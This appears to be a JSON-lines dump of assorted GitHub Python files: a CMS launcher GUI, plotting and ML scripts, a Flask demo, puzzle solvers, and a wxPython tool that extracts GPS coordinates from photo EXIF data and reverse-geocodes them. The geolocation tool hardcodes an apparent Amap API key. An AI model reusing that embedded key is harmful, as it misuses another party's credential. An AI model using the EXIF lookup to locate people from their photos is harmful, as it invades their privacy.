str(values[7]))\n            config.set(\"webConfig\", str(\"item_hex_len\"), str(seasons(values[8])))\n            config.set(\"webConfig\", str(\"web_debug\"), str(values[9]))\n            if validipv4(values[10]):\n                config.set(\"webConfig\", str(\"web_ip\"), str(values[10]))\n            else:\n                sg.Popup(\"Type a valid IP address\")\n                window.FindElement(10).Update(values[10][:-1])\n            if values[11].isdigit():\n                config.set(\"webConfig\", \"web_port\", values[11])\n            else:\n                sg.Popup(\"Type a valid port number that is not already in use\")\n                window.FindElement(11).Update(values[11][:-1])\n            config.set(\"webConfig\", str(\"web_theme\"), str(values[12]))\n            config.set(\"webConfig\", str(\"theme_switcher\"), str(values[13]))\n\n            with open(configPath, \"w+\") as f:\n                config.write(f)\n        if event == \"Start Server\":\n            window.Element('Start Server').Update(disabled=True)\n            window.Element('Stop Server').Update(disabled=False)\n            if isPortFree(values[10], int(values[11])):\n                threading.Thread(target=runWeb).start()\n                os.startfile(\"http://\" + config.get(\"webConfig\",\"web_ip\") + \":\" + 
config.get(\"webConfig\",\"web_port\"))\n else:\n sg.Popup(\"Port %s is already in use, \\nchange the port or close the program that use it\" % values[10])\n if event == \"Stop Server\":\n os.system('taskkill /f /im DTpyWeb.exe')\n os.system('taskkill /f /im python.exe')\n os.system('start DTpyWeb.exe')\n\nif __name__ == '__main__':\n thegui()","repo_name":"r00tmebaby/DTpyweb-MUOnline-CMS","sub_path":"Python GUI Versions/DTpyWeb GUI v2 source/DTpyWeb.py","file_name":"DTpyWeb.py","file_ext":"py","file_size_in_byte":14845,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"2370145859","text":"import numpy as np\nfrom util import *\n#%matplotlib inline\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pandas import Series,DataFrame\nimport matplotlib.animation as animation\nimport time\nimport datetime as dt\n\n\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n\n\ndef animate(i):\n pullData = open(\"Data/data_demo.csv\",\"r\").read()\n dataArray = pullData.split('\\n')\n xar = []\n yar = []\n zar = []\n p = 0;\n for eachLine in dataArray:\n if len(eachLine)>1 and p==1:\n t,x,y = eachLine.split(';')\n xar.append(float(x))\n yar.append(float(t))\n zar.append(float(y))\n p = 1\n ax1.clear()\n ax1.set_title(\"Realtime metric CPU Plot\")\n ax1.set_xlabel(\"Time\")\n ax1.set_ylabel(\"Values in %\")\n ax1.plot(yar,xar)\n ax1.plot(yar,zar)\n #time.sleep(1)\n\n\n\nani = animation.FuncAnimation(fig, animate,interval=1000)\n\n\n\nplt.show()\n","repo_name":"heekof/Forecasting-ANN","sub_path":"live_graph.py","file_name":"live_graph.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73557210611","text":"import torch.nn as nn\r\nimport math\r\n\r\n\"\"\"\r\n Binary Classifier\r\n\"\"\"\r\n\r\nclass Binary_Classifier(nn.Module):\r\n def __init__(self, in_dim):\r\n super(Binary_Classifier, self).__init__()\r\n self.classifier = nn.Sequential(\r\n nn.Linear(in_dim, 4096),\r\n nn.BatchNorm1d(4096),\r\n nn.ReLU(True),\r\n nn.Linear(4096, 4096),\r\n nn.BatchNorm1d(4096),\r\n nn.ReLU(True),\r\n nn.Dropout(0.4),\r\n \r\n nn.Linear(4096,2048),\r\n nn.BatchNorm1d(2048),\r\n nn.ReLU(True),\r\n nn.Linear(2048,2048),\r\n nn.BatchNorm1d(2048),\r\n nn.ReLU(True),\r\n nn.Dropout(0.35), \r\n \r\n nn.Linear(2048,1024),\r\n nn.BatchNorm1d(1024),\r\n nn.ReLU(True),\r\n nn.Dropout(0.3), \r\n \r\n nn.Linear(1024,512),\r\n nn.BatchNorm1d(512),\r\n nn.ReLU(True),\r\n nn.Dropout(0.25), \r\n \r\n nn.Linear(512,2) # Binary \r\n )\r\n# # Initialize weights(L2 norm)\r\n# for m in self.modules():\r\n# if isinstance(m, nn.Conv2d):\r\n# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\r\n# m.weight.data.normal_(0, math.sqrt(2. 
/ n))\r\n# m.bias.data.zero_()\r\n \r\n def forward(self, x):\r\n out = self.classifier(x)\r\n return out\r\n","repo_name":"willyouyang/MachineLearningForPython","sub_path":"TBrain/CredictCard/Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"244456921","text":"\nfrom flask import Flask, render_template,request,redirect,url_for\napp = Flask(__name__)\nfoods=[\n {\"name\":\"Pizza\",\"price\":20,\"id\":1},\n {\"name\":\"Chicken\",\"price\":15,\"id\":2},\n {\"name\":\"Rice\",\"price\":2,\"id\":3}\n]\n@app.route(\"/\",methods=[\"GET\"])\ndef index():\n return render_template(\"food.html\",FOODS=foods) \n\n@app.route('/delete/')\ndef delete_food(food_id):\n for v in foods:\n if v[\"id\"]==int(food_id):\n foods.remove(v)\n break\n return redirect(url_for('index'))\n@app.route(\"/\",methods=['POST'])\ndef post_food():\n food_name=request.form.get('name')\n food_price=request.form.get('price')\n food_id=foods[len(foods)-1]['id']+1\n foods.append({'name':food_name,'price':food_price,'id':food_id})\n return redirect(url_for('index'))\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"thuchimney292/thutran-web-lesson2","sub_path":"food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38206422785","text":"#!/usr/bin/env python\n\nfrom lib import crt\nfrom functools import reduce\nimport re\n\nif __name__ == '__main__':\n with open('../input.txt', 'r') as f:\n input_list = f.readlines()\n\n pattern = \"Disc #[0-9]+ has ([0-9]+) positions; at time=0, it is at position ([0-9]+).\"\n regex = [ re.search(pattern, line) for line in input_list]\n init = [(int(r.group(2)), int(r.group(1))) for r in regex] \n\n def solve_cong(xs):\n congs = [(-disc[0]-i-1, disc[1]) for i, disc in enumerate(xs)]\n return reduce(crt, congs)[0]\n\n p1 = solve_cong(init)\n init.append((0, 11))\n p2 = solve_cong(init)\n\n print(f\"Part 1 answer: {p1}\")\n print(f\"Part 2 answer: {p2}\")\n","repo_name":"chenson2018/advent-of-code","sub_path":"2016/15/python/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42788592995","text":"import json\nwith open('estoque.json', 'r') as arquivo:\n estoque = arquivo.read()\ndicionario = json.loads(estoque)\nprodutos = dicionario['produtos']\nvalor = 0\nfor d in produtos:\n valor += float(d['quantidade'])*float(d['valor'])\nprint(valor)\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_170/ch159_2020_05_02_17_30_48_003716.py","file_name":"ch159_2020_05_02_17_30_48_003716.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11372403102","text":"import networkx as nx\n\nclass NetworkEstimator(object):\n\n _data = None\n\n def fit(self, data):\n self._data = data\n\n def to_network(self, threshold, additional_attributes=None):\n \"\"\"\n Returns networkx network of the graph generated by the method, thresholded at threshold\n :param threshold: threshold to put on the adjacency matrix (adjacencies > threshold will have an edge)\n :param additional_attributes: other attributes to apply to edges (dict)\n :return:\n \"\"\"\n graph = nx.Graph()\n\n for node in 
self._data.index:\n graph.add_node(node)\n\n adjacency = self.adjacency_\n true_interactions = adjacency > threshold\n # leave only the ones that have interaction=True\n adjacency = adjacency[true_interactions]\n\n if additional_attributes is None:\n additional_attributes = {}\n\n for (node_a, node_b), weight in adjacency.iteritems():\n kwargs = additional_attributes.get((node_a, node_b), {})\n\n graph.add_edge(node_a, node_b, weight=weight, **kwargs)\n\n return graph\n\n def p_values(self):\n raise NotImplementedError","repo_name":"lukauskas/publications-lukauskas-2024-marcs","sub_path":"00-main-results/src/snapanalysis/models/network/network_estimator.py","file_name":"network_estimator.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71960761652","text":"\"\"\"\nProject Euler Problem 67: Maximum path sum II\n\nBy starting at the top of the triangle below and moving to adjacent numbers on the row below, the maximum total from top to bottom is 23.\n\n3\n7 4\n2 4 6\n8 5 9 3\n\nThat is, 3 + 7 + 4 + 9 = 23.\n\nFind the maximum total from top to bottom in triangle.txt (right click and 'Save Link/Target As...'), a 15K text file containing a triangle with one-hundred rows.\n\nNOTE: This is a much more difficult version of Problem 18. It is not possible to try every route to solve this problem, as there are 299 altogether!\nIf you could check one trillion (1012) routes every second it would take over twenty billion years to check them all.\nThere is an efficient algorithm to solve it. ;o)\n\"\"\"\n\n# Code adapted from 018_maximum_path_sum_i.py.\n\nimport numpy as np\n\n# Parse triangle numbers.\ntriangleList = []\nwith open('imports/p067_triangle.txt') as f:\n for triangleString in f:\n triangleList.append(list(map(int, triangleString.split(' '))))\n\n# Find number of lines in triangle.\nlinesNum = len(triangleList[-1])\n\n# Start from last line. Choose between side to side numbers (keep larger). 
Decrease elements linearly by summation.\nfor lineNum in range(linesNum-1, 0, -1):\n for k in range(len(triangleList[lineNum])-1):\n triangleList[lineNum-1][k] += max(triangleList[lineNum][k], triangleList[lineNum][k+1])\n\nprint(triangleList[0][0])\n","repo_name":"biancaleeyx/projectEuler","sub_path":"067_maximum_path_sum_ii.py","file_name":"067_maximum_path_sum_ii.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17419547316","text":"from lxml import etree\r\nimport chord\r\nimport time\r\n\r\nsvg = etree.parse(\"nextstrain_ncov_global.svg\")\r\nroot = svg.getroot()\r\ncountries = {}\r\nfor element in root:\r\n #print(element.get(\"id\"))\r\n if (element.get(\"id\") == \"treeLegend\"):\r\n lastColor = 0\r\n for country in element.iter():\r\n #print(country.tag)\r\n #print(country.text)\r\n if(country.tag == \"{http://www.w3.org/2000/svg}rect\"):\r\n lastColor = country.get(\"stroke\")\r\n if(country.tag == \"{http://www.w3.org/2000/svg}title\"):\r\n #print(str(country.text) + \" \" + str(lastColor))\r\n countries[country.text] = {\"color\":lastColor, \"coordinates\":\"\"}\r\n\r\npaths = []\r\ncountries['South America']['coordinates'] = '449,365'\r\nfor element in root:\r\n if (element.get(\"id\") == \"map\"):\r\n for div in element.iter():\r\n #print(element.tag)\r\n if (div.tag == \"{http://www.w3.org/2000/svg}circle\"):\r\n #print(\"circle\")\r\n transform = div.get(\"transform\")\r\n thisCoordinate = transform.split('(')[1][:-1]\r\n thisX = int(thisCoordinate.split(',')[0])%1024\r\n thisCoordinate = str(thisX)+','+thisCoordinate.split(',')[1]\r\n style = str(div.get(\"style\")).split()\r\n thisColor = style[1+style.index(\"stroke:\")] + ' ' + style[2+style.index(\"stroke:\")] + ' ' + style[3+style.index(\"stroke:\")][:-1]\r\n for country in countries:\r\n if (countries[country][\"color\"] == thisColor):\r\n countries[country][\"coordinates\"]=thisCoordinate\r\n #print(countries[country])\r\n print(\"countries\")\r\n print(countries)\r\n for div in element.iter():\r\n if (div.tag == \"{http://www.w3.org/2000/svg}path\"):\r\n data = str(div.get(\"d\")).split('L')\r\n countryA = data[0][1:]\r\n thisX = int(countryA.split(',')[0])%1024\r\n countryA = str(thisX)+','+countryA.split(',')[1]\r\n countryB = data[-1]\r\n thisX = int(countryB.split(',')[0])%1024\r\n countryB = str(thisX)+','+countryB.split(',')[1]\r\n style = str(div.get(\"style\")).split()\r\n thisColor = style[1+style.index(\"stroke:\")] + ' ' + style[2+style.index(\"stroke:\")] + ' ' + style[3+style.index(\"stroke:\")][:-1]\r\n for country in countries:\r\n if (countries[country][\"color\"] == thisColor):\r\n thisColor = country\r\n if (countryA == countries[country][\"coordinates\"]):\r\n countryA = country\r\n if (countryB == countries[country][\"coordinates\"]):\r\n countryB = country\r\n src = thisColor\r\n dest = countryA\r\n if (src == dest):\r\n dest = countryB\r\n paths.append({\"src\":src, \"dest\":dest})\r\n #if(src == \"Japan\" or dest==\"Japan\"):\r\n #print(paths[-1])\r\n if(not all(x.isalpha() or x.isspace() for x in dest) or not all(x.isalpha() or x.isspace() for x in src)):\r\n print(paths[-1])\r\n \r\nrelationalMatrix = [[0]*len(countries) for x in range(len(countries))]\r\n#print(relationalMatrix)\r\ncountryList = list(countries.keys())\r\nfor path in paths:\r\n relationalMatrix[countryList.index(path[\"src\"])][countryList.index(path[\"dest\"])]+=1\r\nsmallMatrix = []\r\nfor i in range(6):\r\n 
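# keep the first 5 columns of each of the first 6 rows - a small sample of the full matrix\r\n    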
smallMatrix.append(relationalMatrix[i][0:5])\r\nprint(relationalMatrix)\r\nprint(smallMatrix)\r\nchord.Chord(relationalMatrix, countryList, wrap_labels=False, font_size=\"8px\", font_size_large=\"8px\").to_html()\r\n\r\n\r\nimport plotly.graph_objects as go\r\n\r\ndef make_sankey(countryName):\r\n links = dict(\r\n source = [],\r\n target = [],\r\n value = [],\r\n hovertemplate='%{value} strains have spread from %{source.label} to %{target.label}' \r\n )\r\n countryIndex = countryList.index(countryName)\r\n myCountryList = [countryName]\r\n for i in range(len(countryList)):\r\n if (i == countryIndex):\r\n if (relationalMatrix[i][i]>0):\r\n links[\"source\"].append(0)\r\n links[\"target\"].append(0)\r\n links[\"value\"].append(relationalMatrix[i][i])\r\n else:\r\n if (relationalMatrix[countryIndex][i]>0):\r\n #myCountryList.append(\"\" + str(countryList[i]) + \"\")\r\n myCountryList.append(str(countryList[i]))\r\n links[\"source\"].append(0)\r\n links[\"target\"].append(len(myCountryList)-1)\r\n links[\"value\"].append(relationalMatrix[countryIndex][i])\r\n if (relationalMatrix[i][countryIndex]>0):\r\n #myCountryList.append(\"\" + str(countryList[i]) + \"\")\r\n myCountryList.append(str(countryList[i]))\r\n links[\"source\"].append(len(myCountryList)-1)\r\n links[\"target\"].append(0)\r\n links[\"value\"].append(relationalMatrix[i][countryIndex])\r\n fig = go.Figure(data=[go.Sankey(\r\n node = dict(\r\n pad = 15,\r\n thickness = 20,\r\n line = dict(color = \"black\", width = 0.5),\r\n label = myCountryList,\r\n color = \"blue\",\r\n hovertemplate='%{label}: %{value}'\r\n ),\r\n link = links\r\n )])\r\n\r\n fig.update_layout(title_text= str(countryName) + \" Sankey Diagram\", font_size=10)\r\n fig.write_html(str(countryName) + '_sankey.html', auto_open=False)\r\n\r\nfor country in countryList:\r\n make_sankey(country)\r\n","repo_name":"micah-kitzler/CovidData","sub_path":"Sankey Chart Maker/next_strain_analysis.py","file_name":"next_strain_analysis.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26995105261","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\n# from matplotlib import pyplot as plt\n# from pandas.plotting import scatter_matrix\n\n\nMyInternationalData = pd.read_csv('international_matches.csv')\n\n\ndef createList():\n global MyInternationalData\n Teams = MyInternationalData['home_team']\n FIFARank = MyInternationalData['home_team_fifa_rank']\n FIFAPoints = MyInternationalData['home_team_total_fifa_points']\n TeamsForProcess = list(zip(Teams , FIFARank , FIFAPoints))\n TeamsForProcess.reverse()\n return TeamsForProcess\nTeamsForProcess = createList()\n\ndef Versus(home , away , Teams):\n homebool = 0\n awaybool = 0\n hometeam = ()\n awayteam = ()\n for i in Teams:\n if(homebool == 0):\n if(i[0] == home):\n homebool = 1\n hometeam = i\n if(awaybool == 0):\n if(i[0] == away):\n awaybool = 1\n awayteam = i\n if(awaybool and homebool == 1 ):\n return hometeam , awayteam\ndef Predict(Home , Away ,Teams):\n global MyInternationalData\n x = MyInternationalData.drop(columns=['home_team_continent' ,'away_team_continent', \n 'home_team' , 'away_team' ,'home_team_score' ,\t'away_team_score' , 'home_team_result' , 'date' , 'tournament' ,\t'city' ,\n 'country' , 'neutral_location' ,\t'shoot_out' , 
'home_team_goalkeeper_score'\t,'away_team_goalkeeper_score'\t,\n 'home_team_mean_defense_score'\t,'home_team_mean_offense_score'\t,'home_team_mean_midfield_score'\t,'away_team_mean_defense_score'\t,\n 'away_team_mean_offense_score',\t'away_team_mean_midfield_score'])\n y = MyInternationalData['home_team_result']\n\n X_train, X_test, Y_train, Y_test = train_test_split(x, y, test_size=0.2, random_state=42)\n model = KNeighborsClassifier(n_neighbors=42)\n fit = model.fit(X_train, Y_train)\n result = model.predict(X_test)\n accuracyScore = accuracy_score(Y_test , result)\n home , away = Versus(Home , Away , Teams)\n result = model.predict(\n [[\n home[1] , away[1] , home[2] ,away[2]\n ]]\n )\n return result\n # print(accuracyScore)\n\n# MyInternationalData = MyInternationalData.drop(columns=['home_team_continent' ,'away_team_continent', \n# 'home_team' , 'away_team' ,'home_team_score' ,\t'away_team_score' , 'home_team_result' , 'date' , 'tournament' ,\t'city' ,\n# 'country' , 'neutral_location' ,\t'shoot_out' , 'home_team_goalkeeper_score'\t,'away_team_goalkeeper_score'\t,\n# 'home_team_mean_defense_score'\t,'home_team_mean_offense_score'\t,'home_team_mean_midfield_score'\t,'away_team_mean_defense_score'\t,\n# 'away_team_mean_offense_score',\t'away_team_mean_midfield_score'])\n# scatter_matrix(MyInternationalData, figsize=(12, 8))\n# MyInternationalData.plot()\n# plt.show()\n\n#print Accuracy\n# Predict(\"\" , \"\" , TeamsForProcess )\n\n\n","repo_name":"ahmedromia-oss/Machine-learning-web-app-predict-football-match-winner","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21116610595","text":"\nimport os\n\n\nfilenames = os.listdir('./data')\nprint()\nwith open('merged.txt', 'w') as outfile:\n for fname in filenames:\n if '.txt' in fname:\n with open('./data/' +fname) as infile:\n outfile.write(infile.read())\n","repo_name":"ketankokane94/datastructures_algos","sub_path":"project_2/code/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24017049472","text":"'''import torch\nimport torchvision.transforms as transforms\nimport cv2\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport torchvision.models as models\nimport torch.nn as nn\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\n\ndevice = torch.device(\"cpu\")\nclasses = [\"cat\", \"dog\", \"elephant\", \"panda\"]\n\nmodel_ft = models.resnet50(pretrained=True)\nnum_ftrs = model_ft.fc.in_features\nmodel_ft.fc = nn.Linear(num_ftrs, 4)\n\nmodel_ft.load_state_dict(torch.load(f=r\"F:\\EmbeddedProject\\Classification\\classifier.pth\", map_location=torch.device('cpu')))\n\nimg = cv2.imread(r\"F:\\EmbeddedProject\\Classification\\DATASET\\test\\panda\\panda_00017.jpg\")\nimg1 = cv2.resize(img,(224, 224))\nimg2 = torch.tensor(img1)\nimg3 = torch.reshape(img2, (1, 3, 224, 224))\n\nout = model_ft(img3.float())\nout = list(out.detach().numpy()[0])\n\nplt.imshow(img, cmap='gray')\nplt.title(classes[out.index(max(out))])\nplt.show()'''\nimport torch\nimport torchvision\nimport torch.nn as nn\nfrom torchvision import transforms\nimport torch.utils.data as data\nimport torchvision.models as models\n\n\ndef DATA_LOADER():\n #train_folder = r\"F:\\EmbeddedProject\\Classification\\DATASET\\train\"\n #test_folder = r\"F:\\EmbeddedProject\\Classification\\DATASET\\test\"\n 
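# note: the same augmenting transform (random flips and rotation) is applied to the\n    # test folder below as well; a deterministic resize + normalise is more typical at eval time\n    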
BATCH_SIZE = 10\n Transforming = transforms.Compose([\n transforms.Resize((128, 128)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.RandomRotation((30, 120)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.4, 0.5], std=[0.22, 0.24, 0.22])])\n train_data = torchvision.datasets.ImageFolder(root=r\"F:\\EmbeddedProject\\Classification\\DATASET\\train\", transform=Transforming)\n test_data = torchvision.datasets.ImageFolder(root=r\"F:\\EmbeddedProject\\Classification\\DATASET\\test\", transform=Transforming)\n train_loader = data.DataLoader(train_data, batch_size=BATCH_SIZE, shuffle=True)\n test_loader = data.DataLoader(test_data, batch_size=BATCH_SIZE, shuffle=True)\n return train_loader, test_loader\n\ntrain_loader, test_loader = DATA_LOADER()\ndataiter = iter(test_loader)\nimages, labels = dataiter.next()\n\nmodel_ft = models.resnet50(pretrained=True)\nnum_ftrs = model_ft.fc.in_features\nmodel_ft.fc = nn.Linear(num_ftrs, 4)\n\nmodel_ft.load_state_dict(torch.load(f=r\"F:\\EmbeddedProject\\Classification\\classifier.pth\", map_location=torch.device('cpu')))\n\ncorrect = 0\ntotal = 0\nwith torch.no_grad():\n for data in test_loader:\n images, labels = data\n outputs = model_ft(images)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\nprint('Accuracy of the network on test images: %d %%' % (100 * correct / total))\n","repo_name":"Manonmani-PL/animal_posture_detection","sub_path":"code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73533982773","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport wx\r\nimport wx.adv\r\nimport os\r\nimport random\r\nimport time\r\nfrom PIL import Image\r\nimport math\r\nimport hashlib\r\nimport urllib.parse\r\nfrom urllib.parse import urlencode\r\nimport urllib.response\r\nfrom urllib.request import urlopen\r\nimport base64\r\nimport json\r\nimport requests \r\nimport cv2\r\nimport numpy as np\r\nimport exifread\r\nfrom decimal import Decimal\r\nfrom position_utils import *\r\nimport datetime\r\n\r\ndef create(parent):\r\n return Frame1(parent)\r\n\r\n[wxID_FRAME1, \r\n wxID_FRAME1BEAUTY, \r\n wxID_FRAME1BTN_CLEAR, \r\n wxID_FRAME1BTN_TEST_BEAUTY, \r\n wxID_FRAME1BTN_TEST_POSION, \r\n wxID_FRAME1GENERICDIRCTRL1,\r\n wxID_FRAME1PANEL1,\r\n wxID_FRAME1SASHLAYOUTWINDOW1, \r\n wxID_FRAME1TEXTRETURN, \r\n] = [wx.NewId() for _init_ctrls in range(9)]\r\n\r\nclass Frame1(wx.Frame):\r\n def _init_ctrls(self, prnt):\r\n # generated method, don't edit\r\n wx.Frame.__init__(self, id=wxID_FRAME1, name='', parent=prnt,\r\n pos=wx.Point(438, 55), size=wx.Size(873, 704),\r\n style=wx.DEFAULT_FRAME_STYLE, title=u'pic_check')\r\n self.SetClientSize(wx.Size(857, 665))\r\n self.Bind(wx.EVT_SIZE, self.OnFrame1Size)\r\n\r\n self.panel1 = wx.Panel(id=wxID_FRAME1PANEL1, name='panel1', parent=self,\r\n pos=wx.Point(392, -8), size=wx.Size(463, 664),\r\n style=wx.TAB_TRAVERSAL)\r\n self.panel1.SetMinSize(wx.Size(455, 778))\r\n\r\n self.sashLayoutWindow1 = wx.adv.SashLayoutWindow(id=wxID_FRAME1SASHLAYOUTWINDOW1,\r\n name='sashLayoutWindow1', parent=self, pos=wx.Point(0, 0),\r\n size=wx.Size(392, 664), style=wx.CLIP_CHILDREN|wx.adv.SW_3D)\r\n self.sashLayoutWindow1.SetAlignment(wx.adv.LAYOUT_LEFT)\r\n self.sashLayoutWindow1.SetOrientation(wx.adv.LAYOUT_VERTICAL)\r\n self.sashLayoutWindow1.SetSashVisible(wx.adv.SASH_RIGHT, 
True)\r\n self.sashLayoutWindow1.SetDefaultSize(wx.Size(392, 664))\r\n self.sashLayoutWindow1.Bind(wx.adv.EVT_SASH_DRAGGED,\r\n self.OnSashLayoutWindow1SashDragged,\r\n id=wxID_FRAME1SASHLAYOUTWINDOW1)\r\n\r\n self.textReturn = wx.TextCtrl(id=wxID_FRAME1TEXTRETURN,\r\n name=u'textReturn', parent=self.panel1, pos=wx.Point(104, 0),\r\n size=wx.Size(1110, 1050), style=wx.TE_MULTILINE, value='')\r\n\r\n self.genericDirCtrl1 = wx.GenericDirCtrl(defaultFilter=0, dir='.',\r\n filter=u'Fichier png(*.png,*.jpg)|*.png;*.jpg',\r\n id=wxID_FRAME1GENERICDIRCTRL1, name='genericDirCtrl1',\r\n parent=self.sashLayoutWindow1, pos=wx.Point(0, 0),\r\n size=wx.Size(392, 664),\r\n style=wx.DIRCTRL_3D_INTERNAL | wx.SUNKEN_BORDER)\r\n self.genericDirCtrl1.SetMinSize(wx.Size(270, 664))\r\n self.genericDirCtrl1.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSel)\r\n\r\n self.btn_test_posion = wx.Button(id=wxID_FRAME1BTN_TEST_POSION,\r\n label=u'\\u4f4d\\u7f6e\\u68c0\\u6d4b', name=u'btn_test_posion',\r\n parent=self.panel1, pos=wx.Point(16, 116), size=wx.Size(75, 24),\r\n style=0)\r\n self.btn_test_posion.Bind(wx.EVT_BUTTON, self.Onbtn_test_posionButton,\r\n id=wxID_FRAME1BTN_TEST_POSION)\r\n\r\n self.btn_test_beauty = wx.Button(id=wxID_FRAME1BTN_TEST_BEAUTY,\r\n label=u'\\u989c\\u503c\\u68c0\\u6d4b', name=u'btn_test_beauty',\r\n parent=self.panel1, pos=wx.Point(16, 176), size=wx.Size(75, 24),\r\n style=0)\r\n self.btn_test_beauty.Bind(wx.EVT_BUTTON, self.Onbtn_test_beautyButton,\r\n id=wxID_FRAME1BTN_TEST_BEAUTY)\r\n\r\n self.btn_clear = wx.Button(id=wxID_FRAME1BTN_CLEAR,\r\n label=u'\\u6e05\\u7a7a\\u7ed3\\u679c', name=u'btn_clear',\r\n parent=self.panel1, pos=wx.Point(16, 236), size=wx.Size(75, 24),\r\n style=0)\r\n self.btn_clear.Bind(wx.EVT_BUTTON, self.Onbtn_clearButton,\r\n id=wxID_FRAME1BTN_CLEAR)\r\n\r\n\r\n\r\n def __init__(self, parent):\r\n self._init_ctrls(parent)\r\n self.FileName=None\r\n self.gender =0\r\n\r\n def checkStatusRange(self, event):\r\n return event.GetDragStatus() != wx.SASH_STATUS_OUT_OF_RANGE\r\n\r\n def doLayout(self):\r\n wx.adv.LayoutAlgorithm().LayoutWindow(self, self.panel1)\r\n self.panel1.Refresh()\r\n \r\n def OnWxframe1Size(self, event):\r\n self.doLayout()\r\n\r\n def OnSashLayoutWindow1SashDragged(self, event):\r\n if self.checkStatusRange(event):\r\n self.sashLayoutWindow1.SetDefaultSize(wx.Size(event.GetDragRect().width, 1000))\r\n self.doLayout()\r\n event.Skip()\r\n\r\n def OnSashLayoutWindow2SashDragged(self, event):\r\n if self.checkStatusRange(event):\r\n self.sashLayoutWindow2.SetDefaultSize(wx.Size(event.GetDragRect().width, 1000))\r\n self.doLayout()\r\n event.Skip()\r\n\r\n def OnFrame1Size(self, event):\r\n self.doLayout()\r\n event.Skip()\r\n\r\n \r\n def OnSel(self, event):\r\n self.FileName = self.genericDirCtrl1.GetFilePath()\r\n \r\n def Onbtn_clearButton(self, event):\r\n self.textReturn.Clear()\r\n event.Skip()\r\n\r\n def get_address(self, location):\r\n api_key = \"516453e417b50bcf6716040c234b6c1f\"\r\n url_get_position = 'https://restapi.amap.com/v3/geocode/regeo?key={}&location={}'\r\n resp = requests.get(url_get_position.format(api_key, location))\r\n location_data = json.loads(resp.text)\r\n address = location_data.get('regeocode').get('formatted_address')\r\n return address\r\n\r\n def format_lati_long_data(self, data):\r\n data_list_tmp = str(data).replace('[', '').replace(']', '').split(',')\r\n data_list = [data.strip() for data in data_list_tmp]\r\n data_tmp = data_list[-1].split('/')\r\n data_sec = int(data_tmp[0]) / int(data_tmp[1]) / 3600\r\n data_tmp = 
data_list[-2]\r\n data_minute = int(data_tmp) / 60\r\n data_degree = int(data_list[0])\r\n result = \"%.6f\" % (data_degree + data_minute + data_sec)\r\n return float(result)\r\n\r\n def get_image_ability(self,img):\r\n img_exif = exifread.process_file(open(img, 'rb'))\r\n\r\n if img_exif:\r\n latitude_gps = img_exif['GPS GPSLatitude']\r\n latitude_direction = img_exif['GPS GPSLatitudeRef']\r\n longitude_gps = img_exif['GPS GPSLongitude']\r\n longitude_direction = img_exif['GPS GPSLongitudeRef']\r\n take_time = img_exif['EXIF DateTimeOriginal']\r\n format_time = str(take_time).split(\" \")[0].replace(\":\", \"-\")\r\n self.textReturn.AppendText('date : '+ format_time+'\\n')\r\n\r\n if latitude_gps and longitude_gps and take_time:\r\n latitude = self.format_lati_long_data(latitude_gps)\r\n longitude = self.format_lati_long_data(longitude_gps)\r\n location = wgs84togcj02(longitude, latitude)\r\n\r\n return f'{location[0]},{location[1]}'\r\n else:\r\n self.textReturn.AppendText('图片属性不完整。\\n')\r\n return ''\r\n else:\r\n self.textReturn.AppendText('图片不是原图。\\n')\r\n return ''\r\n\r\n def location(self, img):\r\n coordinate = self.get_image_ability(img)\r\n if not coordinate:\r\n return\r\n address = self.get_address(coordinate)\r\n self.textReturn.AppendText('address:'+ address+'\\n')\r\n\r\n def Onbtn_test_posionButton(self, event):\r\n if os.path.isfile(self.FileName):\r\n self.textReturn.AppendText(self.FileName+'\\n')\r\n self.location(self.FileName)\r\n\r\n event.Skip()\t\r\n\t\r\n def get_params(self,img): \r\n params = {'app_id':'1106941552', \r\n 'image':img, \r\n 'mode':'0' , \r\n 'time_stamp':str(int(time.time())), \r\n 'nonce_str':str(int(time.time())), \r\n 